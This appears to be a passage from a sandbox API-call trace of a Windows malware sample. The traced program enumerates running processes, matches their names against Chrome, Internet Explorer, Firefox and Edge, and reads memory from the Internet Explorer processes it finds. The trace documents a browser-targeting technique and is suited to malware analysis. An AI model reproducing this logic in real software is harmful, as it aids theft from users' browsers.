	[0247.035] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0247.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.035] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.035] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0247.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.036] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0247.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x978c
	[0247.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.037] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0247.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.037] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.038] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0247.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.039] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0247.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9790
	[0247.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.041] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0247.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.041] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.041] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0247.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.042] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0247.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9794
	[0247.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.045] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0247.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.046] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.046] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0247.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.047] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0247.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9798
	[0247.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.048] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0247.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.048] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.049] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0247.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.049] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0247.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x979c
	[0247.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.050] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0247.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.051] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.051] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0247.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.051] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.051] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0247.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x97a0
	[0247.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.052] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0247.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.053] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.053] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0247.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.053] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.053] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0247.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x97a4
	[0247.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.054] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0247.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.055] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.055] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0247.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.056] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0247.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x97a8
	[0247.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.057] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0247.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.057] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.059] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0247.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.060] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0247.061] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x97ac
	[0247.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.061] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0247.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.061] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.062] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0247.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.062] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0247.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x97b0
	[0247.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.064] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0247.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.064] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.065] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0247.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.065] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0247.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x97b4
	[0247.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.067] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0247.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.067] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.068] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0247.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.068] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.068] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x97b8
	[0247.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.069] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.070] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.070] NtQueryInformationProcess (in: ProcessHandle=0x97b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.070] ReadProcessMemory (in: hProcess=0x97b8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.071] ReadProcessMemory (in: hProcess=0x97b8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.071] ReadProcessMemory (in: hProcess=0x97b8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.071] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x97bc
	[0247.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.072] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.073] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.073] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.074] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.074] NtQueryInformationProcess (in: ProcessHandle=0x97bc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.074] ReadProcessMemory (in: hProcess=0x97bc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.074] ReadProcessMemory (in: hProcess=0x97bc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.075] ReadProcessMemory (in: hProcess=0x97bc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.075] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.075] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x97c0
	[0247.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.077] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.077] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.077] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0247.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x97c4
	[0247.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0247.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.079] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0247.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.079] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.079] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x97c8
	[0247.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.080] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.080] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.081] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.081] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x97cc
	[0247.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.083] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.083] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.084] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.084] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x97d0
	[0247.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.085] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.085] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.086] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.086] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.087] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x97d4
	[0247.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.087] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.088] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x97d8
	[0247.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.091] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.091] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.092] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.092] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.092] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x97dc
	[0247.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.093] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.093] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.094] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.094] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0247.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x97e0
	[0247.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.095] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0247.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.095] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.096] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0247.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
